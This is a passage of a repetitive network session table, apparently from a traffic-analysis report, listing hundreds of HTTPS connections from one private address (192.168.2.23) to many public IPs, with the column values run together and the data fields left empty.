                                          10655192.168.2.233588244.235.55.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10656192.168.2.235030623.238.106.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10657192.168.2.234156481.59.22.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10658192.168.2.2350850221.112.13.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10659192.168.2.234975876.70.2.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10660192.168.2.2343326210.89.100.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10661192.168.2.233372853.114.157.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10662192.168.2.2340074185.79.197.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10663192.168.2.2335970187.227.235.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10664192.168.2.2345822184.168.194.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10665192.168.2.235000835.221.144.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10666192.168.2.2353082202.177.227.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10667192.168.2.2337410202.108.53.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10668192.168.2.2348630199.80.79.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10669192.168.2.2356586193.198.226.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10670192.168.2.2344364136.193.218.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10671192.168.2.2348324123.95.118.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10672192.168.2.2355314134.211.100.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10673192.168.2.2342756134.145.189.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10674192.168.2.2342210129.252.188.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10675192.168.2.234554083.64.160.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10676192.168.2.2334592139.29.1.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10677192.168.2.235813866.86.136.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10678192.168.2.2357684217.63.172.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10679192.168.2.2355698208.96.64.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10680192.168.2.235131234.54.171.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10681192.168.2.234769066.155.238.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10682192.168.2.235157262.118.118.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10683192.168.2.23596565.249.94.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10684192.168.2.2358998207.24.220.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10685192.168.2.2349604219.160.247.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10686192.168.2.23459685.213.50.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10687192.168.2.23428901.209.216.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10688192.168.2.2343940144.79.64.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10689192.168.2.2336760151.52.162.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10690192.168.2.234870651.95.18.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10691192.168.2.233535885.97.20.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10692192.168.2.2356326196.226.104.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10693192.168.2.235998012.165.148.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10694192.168.2.2340998205.78.235.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10695192.168.2.2346884172.111.245.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10696192.168.2.233859874.187.26.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10697192.168.2.235501635.52.213.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10698192.168.2.234595692.149.113.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10699192.168.2.2335614157.113.45.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10700192.168.2.2356158212.5.47.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10701192.168.2.23383222.9.247.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10702192.168.2.2359032149.24.32.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10703192.168.2.2341298134.246.28.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10704192.168.2.2355948103.58.135.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10705192.168.2.2349696189.102.106.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10706192.168.2.233774298.3.113.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10707192.168.2.233584642.171.83.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10708192.168.2.234511470.81.91.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10709192.168.2.2346430157.131.46.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10710192.168.2.23527804.117.40.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10711192.168.2.234068477.68.196.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10712192.168.2.2347164188.62.190.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10713192.168.2.234075079.131.57.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10714192.168.2.235254646.125.221.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10715192.168.2.2345640109.75.240.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10716192.168.2.2359160154.236.142.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10717192.168.2.234648818.189.195.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10718192.168.2.2343948217.37.54.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10719192.168.2.2343718167.214.145.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10720192.168.2.2355026124.186.177.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10721192.168.2.236049473.97.247.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10722192.168.2.2345078141.123.51.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10723192.168.2.233856846.127.100.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10724192.168.2.2341438122.80.131.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10725192.168.2.235012678.85.205.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10726192.168.2.235211666.61.197.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10727192.168.2.2335094180.101.64.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10728192.168.2.235160661.42.3.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10729192.168.2.23509085.11.181.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10730192.168.2.2333376119.244.189.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10731192.168.2.235738841.71.27.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10732192.168.2.2345728207.72.238.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10733192.168.2.2339056193.27.215.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10734192.168.2.233473293.142.168.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10735192.168.2.234177899.137.211.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10736192.168.2.234688876.3.211.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10737192.168.2.234937266.71.191.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10738192.168.2.234336642.25.81.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10739192.168.2.235621878.160.209.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10740192.168.2.235388439.47.197.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10741192.168.2.234447669.181.240.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10742192.168.2.2354560133.191.159.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10743192.168.2.234263293.137.62.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10744192.168.2.2355400116.220.139.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10745192.168.2.23488468.133.109.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10746192.168.2.2356210187.192.50.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10747192.168.2.2360530151.72.206.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10748192.168.2.2352310219.172.244.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10749192.168.2.234182857.237.58.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10750192.168.2.235336667.40.163.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10751192.168.2.2334448219.212.62.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10752192.168.2.2345620148.227.143.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10753192.168.2.234558457.134.108.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10754192.168.2.234643660.187.84.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10755192.168.2.2358216105.90.33.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10756192.168.2.2347952179.128.34.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10757192.168.2.2340168121.76.17.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10758192.168.2.23544348.109.15.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10759192.168.2.235359067.66.13.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10760192.168.2.2343396188.52.143.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10761192.168.2.234930439.93.210.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10762192.168.2.2337612179.2.119.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10763192.168.2.2335102167.38.165.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10764192.168.2.2340030115.151.130.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10765192.168.2.233416077.173.11.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10766192.168.2.2344684117.106.247.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10767192.168.2.234698860.0.161.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10768192.168.2.2345830132.238.13.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10769192.168.2.2336574175.206.47.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10770192.168.2.233281294.124.161.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10771192.168.2.2351542165.91.82.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10772192.168.2.235185443.73.167.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10773192.168.2.2333430146.216.15.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10774192.168.2.2337806132.16.162.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10775192.168.2.235493682.234.179.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10776192.168.2.2346208181.98.159.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10777192.168.2.236023490.180.194.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10778192.168.2.234025664.217.37.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10779192.168.2.2359346191.222.35.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10780192.168.2.235990075.240.139.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10781192.168.2.233819041.168.51.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10782192.168.2.2350946176.105.242.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10783192.168.2.234744842.136.13.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10784192.168.2.2352808123.94.177.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10785192.168.2.23567561.163.37.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10786192.168.2.234200085.79.242.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10787192.168.2.23455128.117.177.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10788192.168.2.2344216213.100.246.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10789192.168.2.2351684118.36.190.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10790192.168.2.235718895.242.92.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10791192.168.2.2348804180.73.8.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10792192.168.2.235645279.234.177.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10793192.168.2.2354482156.118.117.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10794192.168.2.2346372160.237.213.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10795192.168.2.2343914156.105.33.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10796192.168.2.2342286101.21.135.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10797192.168.2.235891027.28.188.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10798192.168.2.234558444.201.65.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10799192.168.2.2359136147.217.24.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10800192.168.2.234452851.110.97.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10801192.168.2.235008251.26.75.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10802192.168.2.234009289.144.204.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10803192.168.2.235522867.121.187.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10804192.168.2.235238082.1.30.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10805192.168.2.2336754163.69.83.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10806192.168.2.2334530113.60.140.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10807192.168.2.2336198211.109.207.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10808192.168.2.2348894128.187.55.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10809192.168.2.2357742165.68.109.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10810192.168.2.235717684.223.107.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10811192.168.2.2348696131.145.161.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10812192.168.2.236026019.177.243.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10813192.168.2.234263837.104.102.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10814192.168.2.236050041.33.198.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10815192.168.2.2360686182.218.87.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10816192.168.2.235564875.216.233.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10817192.168.2.233953218.134.245.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10818192.168.2.233683023.119.58.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10819192.168.2.2351806148.142.70.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10820192.168.2.2359122138.159.78.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10821192.168.2.23557781.186.109.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10822192.168.2.2354796207.62.183.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10823192.168.2.2333882213.48.105.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10824192.168.2.2347466149.226.190.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10825192.168.2.234375641.204.245.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10826192.168.2.2337352159.144.209.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10827192.168.2.2339680206.39.252.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10828192.168.2.2344154109.131.184.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10829192.168.2.2354758209.148.66.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10830192.168.2.235743865.107.161.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10831192.168.2.233284031.36.71.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10832192.168.2.2360152135.189.82.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10833192.168.2.2334420159.96.101.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10834192.168.2.235166488.102.253.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10835192.168.2.2334960201.215.201.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10836192.168.2.2349880209.70.176.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10837192.168.2.2353258207.4.98.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10838192.168.2.2351926107.25.2.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10839192.168.2.234444254.174.18.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10840192.168.2.234651414.226.59.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10841192.168.2.2351676143.2.123.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10842192.168.2.2359678142.207.193.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10843192.168.2.235983632.69.248.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10844192.168.2.2355508118.235.2.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10845192.168.2.235843244.165.155.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10846192.168.2.2360348105.66.181.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10847192.168.2.2355262162.228.123.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10848192.168.2.2333076184.136.135.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10849192.168.2.2360250189.23.15.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10850192.168.2.2359018112.237.231.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10851192.168.2.2355486161.55.98.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10852192.168.2.2337026117.209.185.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10853192.168.2.233314672.73.136.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10854192.168.2.234876079.140.76.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10855192.168.2.235869877.198.126.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10856192.168.2.2340026168.234.64.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10857192.168.2.235609691.188.125.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10858192.168.2.233960836.91.188.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10859192.168.2.233875239.49.255.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10860192.168.2.235864293.115.110.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10861192.168.2.2360450104.240.22.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10862192.168.2.235813275.204.251.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10863192.168.2.2347830119.178.94.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10864192.168.2.2360058179.46.35.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10865192.168.2.234736474.18.240.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10866192.168.2.234669496.158.3.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10867192.168.2.23513845.68.37.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10868192.168.2.235217278.117.174.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10869192.168.2.234050497.40.253.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10870192.168.2.2353954189.183.219.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10871192.168.2.2354534131.152.81.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10872192.168.2.2341426118.197.92.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10873192.168.2.234492042.247.242.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10874192.168.2.2341114223.74.179.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10875192.168.2.23397342.232.190.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          10876192.168.2.2356574210.104.8.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
